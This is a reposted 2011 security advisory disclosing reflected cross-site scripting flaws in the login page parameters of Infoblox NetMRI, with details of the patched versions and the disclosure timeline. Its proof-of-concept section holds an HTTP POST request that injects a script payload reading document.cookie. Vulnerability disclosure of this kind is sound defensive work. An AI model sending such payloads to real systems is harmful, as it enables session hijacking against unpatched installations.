Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27337
HistoryNov 21, 2011 - 12:00 a.m.

[FOREGROUND SECURITY 2011-004] Infoblox NetMRI 6.2.1 Multiple Cross-Site Scripting (XSS) vulnerabilities

2011-11-2100:00:00
vulners.com
41
JSON

============================================================
FOREGROUND SECURITY, SECURITY ADVISORY 2011-004

  • Original release date: November 10, 2011
  • Discovered by: Jose Carlos de Arriba - Senior Security Analyst at Foreground Security
  • Contact: (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot) com)
  • Severity: 4.3/10 (Base CVSS Score)
    ============================================================

I. VULNERABILITY

Infoblox NetMRI 6.2.1 (latest version available when the vulnerability was discovered), 6.1.2 and 6.0.2.42 Multiple Cross Site Scripting - XSS (prior versions have not been checked but could be vulnerable too).

II. BACKGROUND

Infoblox NetMRI is a network automation solution for configuration, optimization and compliance enforcement. With hundreds of built-in rules and industry best practices, it automates network change, intelligently manages device configurations and reduces the risk of human error.

III. DESCRIPTION

Infoblox NetMRI 6.2.1 (latest version available when the vulnerability was discovered), 6.1.2 and 6.0.2.42 presents multiple Cross-Site Scripting vulnerabilities on its "eulaAccepted" and "mode" parameters in the admin login page, due to an insufficient sanitization on user supplied data and encoding output.
A malicious user could perform session hijacking or phishing attacks.

IV. PROOF OF CONCEPT

POST /netmri/config/userAdmin/login.tdf HTTP/1.1
Content-Length: 691
Cookie: XXXX
Host: netmrihost:443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.14322)

formStack=netmri/config/userAdmin/login&eulaAccepted=<script>alert(document.cookie)</script>&mode=<script>alert(document.cookie)</script>&skipjackPassword=ForegroundSecurity&skipjackUsername=ForegroundSecurity&weakPassword=false

V. BUSINESS IMPACT

An attacker could perform session hijacking or phishing attacks.

VI. SYSTEMS AFFECTED

Infoblox NetMRI 6.2.1 (latest), 6.1.2 and 6.0.2 branches (prior versions have not been checked but could be vulnerable too).

VII. SOLUTION

Vulnerability fixed on 6.2.2 version - available as of 10 Nov 2011

Also the following security patches are available:

  • v6.2.1-NETMRI-8831
  • v6.1.2-NETMRI-8831
  • v6.0.2-NETMRI-8831

VIII. REFERENCES

http://www.infoblox.com/en/products/netmri.html
http://www.foregroundsecurity.com/
http://www.painsec.com

IX. CREDITS

This vulnerability has been discovered by Jose Carlos de Arriba (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot) com).

X. REVISION HISTORY

  • November 10, 2011: Initial release.

XI. DISCLOSURE TIMELINE

August 28, 2011: Vulnerability discovered by Jose Carlos de Arriba.
August 28, 2011: Vendor contacted by email.
August 29: Vendor response asking for details.
September 21, 2011: Security advisory sent to vendor.
November 10, 2011: Security Fix released by vendor.
November 10, 2011: Security advisory released.

XII. LEGAL NOTICES

The information contained within this advisory is supplied "as-is"with no warranties or guarantees of fitness of use or otherwise.

Jose Carlos de Arriba, CISSP
Senior Security Analyst
Foreground Security
www.foregroundsecurity.com
jcarriba (at) foregroundsecurity (dot) com

JSON